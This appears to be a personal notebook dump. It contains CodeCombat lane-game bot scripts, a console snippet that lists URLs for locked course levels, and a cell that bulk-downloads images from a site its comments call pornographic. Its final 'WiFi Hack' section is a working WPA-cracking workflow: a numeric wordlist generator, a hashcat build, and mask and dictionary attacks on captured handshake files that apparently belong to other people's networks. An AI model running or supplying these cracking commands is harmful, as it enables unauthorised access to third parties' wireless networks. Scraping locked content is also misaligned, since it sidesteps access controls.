    逐一排查障礙物是否存在指定範圍 存在則返回不安全 安全則靠近路徑
  無路可行
    #判斷障礙物多寡
    能用格擋則用
    否則閃現
'''
hero.playAs("sorcerer")

def block(obj):
    '檢測指定物件是否屬於障礙物'
    if (obj.type=='wall') or (obj.type=='bomb'):
        return True
    else:
        return False

def detect(row):
    laneObjects = hero.findAllInLane(row)
    for obj in laneObjects:
        if block(obj) and (obj.pos.x in range(hero.pos.x+2,hero.pos.x+2+4)):
            return False
            break
        else:
            return True

def closeTo(obj,rowNumber=hero.lane):
    if obj:
        if obj.lane > rowNumber and detect(rowNumber+1) and hero.isSafeMoveUp():
            hero.moveUp()
        elif obj.lane < rowNumber and detect(rowNumber-1) and hero.isSafeMoveDown():
            hero.moveDown()

while True:
    row=hero.lane
    wall=hero.findNearestWall(row)
    bomb=hero.findNearestBomb(row)
    if wall and wall.lane==hero.lane and hero.distanceInLane(wall) <= 8:
        if hero.lane+1<=5 and detect(hero.lane+1,wall):
            hero.moveUp()
        elif hero.lane-1>=0 and detect(hero.lane-1,wall):
            hero.moveDown()
        else:
            laneObjects = hero.findAllInLane(row)
            blocks=[]
            for obj in laneObjects:
                if block(obj) and (obj.pos.x in range(hero.pos.x,hero.pos.x+16)):
                    blocks.append(obj)
            if len(blocks) > 2 and hero.costOfPower("sheild") < hero.gold:
                hero.usePower("sheild")
            elif hero.costOfPower("blink") < hero.gold:
                hero.usePower("blink",hero.safestLane())
    elif bomb and bomb.lane==hero.lane:
        hero.shoot()
    else:
        if hero.health < hero.maxHealth:
            # 需要藥水
            closeTo(hero.findNearestPotion())
        else:
            # 可以尋找金幣,陷害對手
            if hero.costOfPower("long-wall")+24 < hero.gold:
                hero.usePower("long-wall")
            elif hero.costOfPower("bomb-wall")+27 < hero.gold:
                hero.usePower("bomb-wall")
            else:
                closeTo(hero.findNearestCoin())
################################################################################
hero.playAs("sorcerer")

def block(obj):
    '檢測指定物件是否屬於障礙物'
    if (obj.type=='wall') or (obj.type=='bomb'):
        return True
    else:
        return False

def detect(row):
    ' asdfghjkl '
    if row in range(0,6):
        laneObjects = hero.findAllInLane(row)
        for obj in laneObjects:
            if (obj.pos.x not in range(hero.pos.x,hero.pos.x+4+1)) and block(obj)==False:
                hero.debug(obj)
                return True

# def bob(row=hero.lane):
#     laneObjects = hero.findAllInLane(row)
#     for obj in laneObjects:
#         if obj.type=='bomb':
#             return True

# def safestay(row=hero.lane):
#     laneObjects = hero.findAllInLane(row)
#     for obj in laneObjects:
#         if block(obj) and hero.distanceInLane(obj)<8:
#             return False

while True:
    wall=hero.findNearestWall()
    bomb=hero.findNearestBomb()
    if wall and wall.lane==hero.lane and hero.distanceInLane(wall) <= 8:
        if hero.lane+1<=5 and detect(hero.lane+1):
            hero.moveUp()
        elif hero.lane-1>=0 and detect(hero.lane-1):
            hero.moveDown()
        elif hero.costOfPower("blink") < hero.gold:
            hero.usePower("blink",hero.safestLane())
    elif bomb and bomb.lane==hero.lane:# and safestay()!=False:
        hero.shoot()
################################################################################
hero.playAs("sorcerer")

def block(obj):
    if obj and (obj.type=='wall' or obj.type=='bomb'):
        return True

def detect(row):
    objs = hero.findAllInLane(row)
    for obj in objs:
        if (obj.pos.x in range(hero.pos.x+2,hero.pos.x+2+8+1)) and block(obj):
            # hero.debug(obj.type,obj.pos.x,hero.pos.x,hero.pos.x+2+8+1,obj.pos.x in range(hero.pos.x+2,hero.pos.x+2+8+1))
            return False

def to(obj):
    if obj:
        if obj.lane > hero.lane and detect(hero.lane+1)!=False:
            hero.moveUp()
        elif obj.lane < hero.lane and detect(hero.lane-1)!=False:
            hero.moveDown()

def isbomb(row=hero.lane):
    obj = hero.findNearestInLane(row)
    if obj and obj.type=='bomb':
        return True
    # objs = hero.findAllInLane()
    # for obj in objs:
    #     if obj.type=='bomb':
    #         return True

def safe(m,row=hero.lane):
    objs = hero.findAllInLane(row)
    for obj in objs:
        if (obj.pos.x in range(hero.pos.x,hero.pos.x+m+1)) and block(obj):
            return False

while True:
    wall = hero.findNearestWall()
    if wall and wall.lane == hero.lane and hero.distanceInLane(wall) <= 8:
        if (hero.lane+1 <= 5 and detect(hero.lane+1)!=False) and (hero.lane-1 >= 0 and detect(hero.lane-1)!=False):
            if hero.health < hero.maxHealth:
                to(hero.findNearestPotion())
            else:
                to(hero.findNearestCoin())
        elif hero.lane+1 <= 5 and detect(hero.lane+1)!=False:
            hero.moveUp()
        elif hero.lane-1 >= 0 and detect(hero.lane-1)!=False:
            hero.moveDown()
        else:
            objs = hero.findAllInLane()
            bock=[]
            for obj in objs:
                if block(obj) and (obj.pos.x in range(hero.pos.x,hero.pos.x+8+1)):
                    bock.append(obj)
            if len(bock) >= 2 and hero.costOfPower("shield") < hero.gold:
                hero.usePower("shield")
            elif hero.costOfPower("blink") < hero.gold:
                hero.usePower("blink",hero.safestLane())
    elif isbomb():# and safe(8):
        hero.shoot()
    elif hero.isSafeStay():
        if hero.health < hero.maxHealth:
            to(hero.findNearestPotion())
        else:
            if hero.costOfPower("long-wall")+hero.costOfPower("bomb-wall")+24 < hero.gold:
                hero.usePower("long-wall")
                hero.usePower("bomb-wall")
            else:
                to(hero.findNearestCoin())
################################################################################
hero.playAs("sorcerer")

def block(obj):
    if obj and (obj.type=='wall' or obj.type=='bomb'):
        return True

def detect(row):
    objs = hero.findAllInLane(row)
    for obj in objs:
        if (obj.pos.x in range(hero.pos.x+2,hero.pos.x+2+8+1)) and block(obj):
            # hero.debug(obj.type,obj.pos.x,hero.pos.x,hero.pos.x+2+8+1,obj.pos.x in range(hero.pos.x+2,hero.pos.x+2+8+1))
            return False

def to(obj):
    if obj:
        if obj.lane > hero.lane and detect(hero.lane+1)!=False:
            hero.moveUp()
        elif obj.lane < hero.lane and detect(hero.lane-1)!=False:
            hero.moveDown()

def isbomb(row=hero.lane):
    obj = hero.findNearestInLane(row)
    if obj and obj.type=='bomb':
        return True
    # objs = hero.findAllInLane()
    # for obj in objs:
    #     if obj.type=='bomb':
    #         return True

def safe(m,row=hero.lane):
    objs = hero.findAllInLane(row)
    for obj in objs:
        if (obj.pos.x in range(hero.pos.x,hero.pos.x+m+1)) and block(obj):
            return False

while True:
    wall = hero.findNearestWall()
    if wall and wall.lane == hero.lane and hero.distanceInLane(wall) <= 8:
        if (hero.lane+1 <= 5 and detect(hero.lane+1)!=False) and (hero.lane-1 >= 0 and detect(hero.lane-1)!=False):
            if hero.health < hero.maxHealth:
                to(hero.findNearestPotion())
            else:
                to(hero.findNearestCoin())
        elif hero.lane+1 <= 5 and detect(hero.lane+1)!=False:
            hero.moveUp()
        elif hero.lane-1 >= 0 and detect(hero.lane-1)!=False:
            hero.moveDown()
        else:
            objs = hero.findAllInLane()
            bock=[]
            for obj in objs:
                if block(obj) and (obj.pos.x in range(hero.pos.x,hero.pos.x+8+1)):
                    bock.append(obj)
            if len(bock) >= 2 and hero.costOfPower("shield") < hero.gold:
                hero.usePower("shield")
            elif hero.costOfPower("blink") < hero.gold:
                hero.usePower("blink",hero.safestLane())
    elif isbomb():# and safe(8):
        hero.shoot()
    elif hero.isSafeStay():
        if hero.health < hero.maxHealth:
            to(hero.findNearestPotion())
        else:
            if hero.costOfPower("long-wall")+24 < hero.gold:
                hero.usePower("long-wall")
            if hero.costOfPower("bomb-wall")+27 < hero.gold:
                hero.usePower("bomb-wall")
            else:
                to(hero.findNearestCoin())
################################################################################
# moveDir = 1
# while True:
#     obj = hero.findNearestInLane()
#     if obj:
#         if obj.type == "wall":
#             if hero.lane == 5:
#                 moveDir = -1
#             elif hero.lane == 0:
#                 moveDir = 1
#             if moveDir == 1:
#                 hero.moveUp()
#             else:
#                 hero.moveDown()
#         else:
#             hero.shoot()
################################################################################
https://codecombat.com/play/level/leave-it-to-cleaver?course=5632661322961295f9428638&course-instance=6039ab5dfc34c5005f5c6650
https://codecombat.com/play/level/go-fetch?course=576965635d4a5f590042d842&course-instance=6039ab5dfc34c5005f5c6650

5703d8007cd2381f00d95984
course-instance=6039ab5dfc34c5005f5c6650
56e85c040c6e9f1f009861f3

box = document.querySelectorAll("div[class='level locked  has-tooltip'][data-level-slug][data-level-original]");
for (let step = 0; step < box.length ; step++) {
  element=box[step];
  console.log('https://codecombat.com/play/level/'+element.getAttribute('data-level-slug')+'?course='+element.getAttribute('data-level-original')+'&course-instance=6039ab5dfc34c5005f5c6650');
}

# Deep Learning things (Going to do)

In [ ]:
#@title links check alive { vertical-output: true, display-mode: "form" }
# coding=utf-8

from re import sub
from requests import get,codes
from google.colab import drive

!wget https://ldwise.github.io/web/ov/links.js
drive.mount('/content/drive')
all = []
newl = []
with open('links.js','r') as r:
  line = r.readline()
  while line:
    if "'" in line:
      newl = []
      link = sub(r"'|\n|\[|\]|,",'',line)
      try:
        requ = get(link,timeout=2)
        # 連綫不成功
        if requ.status_code == codes.ok:
          print(link)
          !wget -i -c -q $link
          newl.append(link)
      except:
        pass
    elif ("[" in line) and (len(newl)!=0):
        all.append(newl)
    line = r.readline()
%cd drive/MyDrive/Colab\ Notebooks
with open('lis.js','w') as w:
  w.write(str(all))

--2021-08-28 04:25:14--  https://ldwise.github.io/web/ov/links.js
Resolving ldwise.github.io (ldwise.github.io)... 185.199.108.153, 185.199.109.153, 185.199.110.153, ...
Connecting to ldwise.github.io (ldwise.github.io)|185.199.108.153|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13806431 (13M) [application/javascript]
Saving to: ‘links.js’

links.js            100%[===================>]  13.17M  --.-KB/s    in 0.1s    

2021-08-28 04:25:15 (105 MB/s) - ‘links.js’ saved [13806431/13806431]

Mounted at /content/drive
https://pbs.twimg.com/media/EZ7RkE7UcAEsGz0?format=jpg&name=900x900
https://pbs.twimg.com/media/EZMD2pCU0AUkPIw?format=jpg&name=medium
https://pbs.twimg.com/media/EZMmGC5U0AACTRq?format=jpg&name=small
https://pbs.twimg.com/media/EZMmGDNVAAAM-ua?format=jpg&name=small
https://pbs.twimg.com/media/EZMmGDNU0AAXqfO?format=jpg&name=small
https://pbs.twimg.com/media/EbQ5PFqXQAEGZg0?format=jpg&name=900x900
https://pbs.twimg.com/media/EZQBTT_VAAEiQKP?form

In [ ]:
#@title 深度學習-圖片分類 { display-mode: "form" }
#有70GB空間可用
#分類色情圖片from網頁ov當中的js
#下載每張圖片
#訓練AI分類(hard)


!wget https://ldwise.github.io/web/ov/url.js
!mkdir img
w=open('imgs.txt','w')
with open('url.js','r') as r:
  line = r.readline()
  while line:
    if ('http' in line) and (('mp4' not in line) or ('m3u8' not in line)):
      line=line.replace("'",'').replace(',','').replace(']','').replace(';','')
      w.write(line)
      print(line)
    line = r.readline()
  r.close()
w.close()
%cd img
!wget -i ./../imgs.txt -c# -b

# WiFi Hack 8位随机数字

In [ ]:
#@title wifi crack { vertical-output: true, display-mode: "form" }

#@markdown #Install requirement hashcat

#@markdown 寻找50 power以上的wifi\
#@markdown wifite -pow 50

#@markdown readme https://blog.csdn.net/weixin_44064908/article/details/103920329
#@markdown https://hashcat.net/wiki/doku.php?id=cracking_wpawpa2

#@markdown aircrack-ng\
#@markdown https://www.cnblogs.com/lsdb/p/10075508.html

#@markdown fluxion\
#@markdown https://blog.csdn.net/qq_43632394/article/details/109131831

# 迭代器
# import itertools as itls
# # 定义变量，变量的值用于生成密码本
# words = "0123456789"
# # 生成8位的密码
# pwds = itls.product(words,repeat=8)
# # 打开文件wifipwd.txt,并且指定为以a模式打开（在文件最后进行添加）
# dic = open("wifipwd.txt", "w+")
# for pwd in pwds:
#     # 将密码保存到txt文件中
#     dic.write("".join(pwd))
#     # 每一个密码进行换行处理
#     dic.write("".join("\n"))
# #  关闭文件
# dic.close()












#导入hccapx握手包
from google.colab import drive
drive.mount('/content/drive')
!cp -r drive/MyDrive/Colab\ Notebooks/wifi handshake

# hashcat
# github page https://github.com/hashcat/hashcat
# cap2hccapx https://hashcat.net/cap2hccapx/
# 查看GPU
!/opt/bin/nvidia-smi
# 下载hashcat
!git clone https://github.com/hashcat/hashcat.git
# 进入目录
%cd hashcat
# 安装hashcat
!make
!make install
# 查看hashcat支持GPU
!hashcat -I
# 爆破密码(GPU -d 千万不要修改 已经测试完成)
# !hashcat -m 2500 -a 3 ../handshake/kang\&ying.hccapx ?d?d?d?d?d?d?d?d -d 2 -D 2 -o ../drive/MyDrive/Colab\ Notebooks/wifi/*.txt --status

Mounted at /content/drive
Sun Apr 18 14:18:17 2021       
+-----------------------------------------------------------------------------+
| NVIDIA-SMI 460.32.03    Driver Version: 460.32.03    CUDA Version: 11.2     |
|-------------------------------+----------------------+----------------------+
| GPU  Name        Persistence-M| Bus-Id        Disp.A | Volatile Uncorr. ECC |
| Fan  Temp  Perf  Pwr:Usage/Cap|         Memory-Usage | GPU-Util  Compute M. |
|                               |                      |               MIG M. |
|===============================+======================+======================|
|   0  Tesla K80           Off  | 00000000:00:04.0 Off |                    0 |
| N/A   44C    P8    31W / 149W |      0MiB / 11441MiB |      0%      Default |
|                               |                      |                  N/A |
+-------------------------------+----------------------+----------------------+
                                                              

In [ ]:
#@title dict attack { vertical-output: true, display-mode: "form" }
!hashcat -m 2500 -d 2 -D 2 -a 0 ../handshake/cswleee.hccapx ../drive/MyDrive/Colab\ Notebooks/wifi/all.txt -o ../drive/MyDrive/Colab\ Notebooks/wifi/pasw.txt --status -O -w 3

In [ ]:
#@title mask attack { vertical-output: true, display-mode: "form" }
!hashcat -m 2500 -a 3 ../handshake/kang\&ying.hccapx ?d?d?d?d?d?d?d?d -d 2 -D 2 -o ../drive/MyDrive/Colab\ Notebooks/wifi/pasw.txt --status -O -w 3